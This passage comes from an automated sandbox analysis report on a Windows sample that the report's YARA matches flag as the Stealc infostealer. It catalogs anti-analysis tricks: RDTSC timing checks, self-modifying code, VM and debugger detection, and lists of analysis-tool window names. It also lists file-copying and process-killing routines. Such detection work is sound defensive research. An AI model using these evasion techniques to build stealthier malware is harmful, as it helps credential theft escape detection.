Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 145180A second address: 145180E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 145180E second address: 145183F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F0F04CBD318h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jl 00007F0F04CBD31Eh 0x00000015 jp 00007F0F04CBD316h 0x0000001b push eax 0x0000001c pop eax 0x0000001d jbe 00007F0F04CBD31Ch 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14519C0 second address: 14519C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14519C4 second address: 14519C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14519C8 second address: 14519CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14519CE second address: 1451A50 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0F04CBD321h 0x00000008 jp 00007F0F04CBD316h 0x0000000e jng 00007F0F04CBD316h 0x00000014 jmp 00007F0F04CBD322h 0x00000019 popad 0x0000001a jng 00007F0F04CBD335h 0x00000020 pop edx 0x00000021 pop eax 0x00000022 push edx 0x00000023 jmp 00007F0F04CBD324h 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F0F04CBD31Fh 0x0000002f push esi 0x00000030 pop esi 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1451A50 second address: 1451A56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1452799 second address: 14527A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14570C1 second address: 14570C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14570C6 second address: 14570E6 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0F04CBD31Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jbe 00007F0F04CBD33Ah 0x00000010 jl 00007F0F04CBD31Eh 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 145A574 second address: 145A57E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F0F0527E406h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 145A57E second address: 145A587 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 145A587 second address: 145A590 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 145A590 second address: 145A5A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0F04CBD324h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1463C7D second address: 1463CAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 popad 0x00000008 jnp 00007F0F0527E42Eh 0x0000000e push edi 0x0000000f push eax 0x00000010 pop eax 0x00000011 push eax 0x00000012 pop eax 0x00000013 pop edi 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F0F0527E418h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14695B8 second address: 14695BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14695BC second address: 14695C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14695C6 second address: 14695CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14695CA second address: 14695CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1477597 second address: 14775D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F0F04CBD316h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007F0F04CBD326h 0x00000014 jmp 00007F0F04CBD325h 0x00000019 push eax 0x0000001a push edx 0x0000001b jne 00007F0F04CBD316h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14841C1 second address: 14841C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14841C5 second address: 14841CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14841CF second address: 14841F9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F0F0527E40Dh 0x0000000d popad 0x0000000e je 00007F0F0527E43Bh 0x00000014 push eax 0x00000015 push edx 0x00000016 jo 00007F0F0527E406h 0x0000001c jnp 00007F0F0527E406h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14841F9 second address: 14841FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1487AEA second address: 1487AF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1487AF2 second address: 1487B0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F04CBD326h 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1487C6C second address: 1487C7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F0F0527E40Ah 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1487DE8 second address: 1487E02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F0F04CBD316h 0x0000000a ja 00007F0F04CBD318h 0x00000010 jns 00007F0F04CBD322h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1487E02 second address: 1487E12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F0F0527E406h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1487E12 second address: 1487E18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1487E18 second address: 1487E1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1487E1C second address: 1487E2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F0F04CBD31Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1487F91 second address: 1487F9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F0F0527E406h 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1487F9C second address: 1487FB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0F04CBD323h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14883E1 second address: 14883E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 148869E second address: 14886B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F0F04CBD316h 0x0000000a pop ecx 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e jns 00007F0F04CBD316h 0x00000014 pop esi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14886B3 second address: 14886D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F0527E418h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007F0F0527E41Ah 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14886D9 second address: 14886DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 148A239 second address: 148A23D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 148A23D second address: 148A24F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a jbe 00007F0F04CBD316h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 148D0BB second address: 148D13A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F0F0527E419h 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007F0F0527E408h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 00000016h 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 mov dl, 1Eh 0x0000002a push dword ptr [ebp+122D2F62h] 0x00000030 push 00000000h 0x00000032 push ebx 0x00000033 call 00007F0F0527E408h 0x00000038 pop ebx 0x00000039 mov dword ptr [esp+04h], ebx 0x0000003d add dword ptr [esp+04h], 00000015h 0x00000045 inc ebx 0x00000046 push ebx 0x00000047 ret 0x00000048 pop ebx 0x00000049 ret 0x0000004a add dword ptr [ebp+122D2A70h], ecx 0x00000050 push F774DC86h 0x00000055 push eax 0x00000056 push edx 0x00000057 pushad 0x00000058 jmp 00007F0F0527E40Ah 0x0000005d push eax 0x0000005e push edx 0x0000005f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 148D13A second address: 148D13F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 148E912 second address: 148E945 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F0527E411h 0x00000007 jmp 00007F0F0527E413h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jp 00007F0F0527E432h 0x00000014 push esi 0x00000015 push esi 0x00000016 pop esi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 148E945 second address: 148E94D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 148E94D second address: 148E953 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14903C5 second address: 14903CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5AF0516 second address: 5AF051A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5AF051A second address: 5AF051E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5AF051E second address: 5AF0524 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5AF0524 second address: 5AF0536 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0F04CBD31Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5AF0536 second address: 5AF0551 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 pushad 0x0000000a mov ah, E9h 0x0000000c mov al, dh 0x0000000e popad 0x0000000f mov dword ptr [esp], ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 movsx edx, si 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5AF05E6 second address: 5AF05FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F04CBD31Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5AF05FB second address: 5AF0622 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F0F0527E410h 0x0000000a sbb ax, CAE8h 0x0000000f jmp 00007F0F0527E40Bh 0x00000014 popfd 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5AF0622 second address: 5AF06AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F0F04CBD325h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e pushad 0x0000000f call 00007F0F04CBD31Ch 0x00000014 pushfd 0x00000015 jmp 00007F0F04CBD322h 0x0000001a sub ah, FFFFFFA8h 0x0000001d jmp 00007F0F04CBD31Bh 0x00000022 popfd 0x00000023 pop eax 0x00000024 pushfd 0x00000025 jmp 00007F0F04CBD329h 0x0000002a and eax, 4A634BC6h 0x00000030 jmp 00007F0F04CBD321h 0x00000035 popfd 0x00000036 popad 0x00000037 mov ebp, esp 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5AF06AB second address: 5AF06AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5AF06AF second address: 5AF06C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F04CBD31Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B042E second address: 13B0438 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 11FDADF instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 11FDB9B instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 13B7DEF instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 142BACD instructions caused by: Self-modifying code

Contains capabilities to detect virtual machines

Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Found evaded block containing many API calls

Source: C:\Users\user\Desktop\file.exe

Evaded block: after key decision

Program does not show much activity (idle)

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F240F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_00F240F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F1E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_00F1E530
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F247C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_00F247C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F1F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00F1F7B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F11710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00F11710
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F1DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_00F1DB80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F24B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00F24B60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F23B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_00F23B00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F1BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_00F1BE40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F1EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_00F1EE20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F1DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00F1DF10

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00F11160 GetSystemInfo,ExitProcess,

0_2_00F11160

Source: file.exe, file.exe, 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.1731587725.0000000001DB2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1731587725.0000000001DE3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.1731587725.0000000001D6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: file.exe, 00000000.00000002.1731587725.0000000001D6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware2,

Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\file.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Checks for debuggers (devices)

Source: C:\Users\user\Desktop\file.exe	File opened: NTICE
Source: C:\Users\user\Desktop\file.exe	File opened: SICE
Source: C:\Users\user\Desktop\file.exe	File opened: SIWVID

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00F14610 VirtualProtect ?,00000004,00000100,00000000

0_2_00F14610

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\file.exe

0_2_00F29BB0

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00F29AA0 mov eax, dword ptr fs:[00000030h]

0_2_00F29AA0

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00F27690 GetWindowsDirectoryA,GetVolumeInformationA,GetProcessHeap,RtlAllocateHeap,wsprintfA,

0_2_00F27690

Program does not show much activity (idle)

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: file.exe PID: 4460, type: MEMORYSTR

Searches for specific processes (likely to inject)

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F29790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,		0_2_00F29790
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F298E0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle,		0_2_00F298E0

Source: file.exe, file.exe, 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: Program Manager

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00F575A8 cpuid

0_2_00F575A8

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\file.exe

Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

0_2_00F27D20

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\file.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00F26BC0 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,

0_2_00F26BC0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00F279E0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

0_2_00F279E0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00F27BC0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,

0_2_00F27BC0

Stealing of Sensitive Information

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.f10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1731587725.0000000001D6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1690239015.0000000005960000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 4460, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Remote Access Functionality

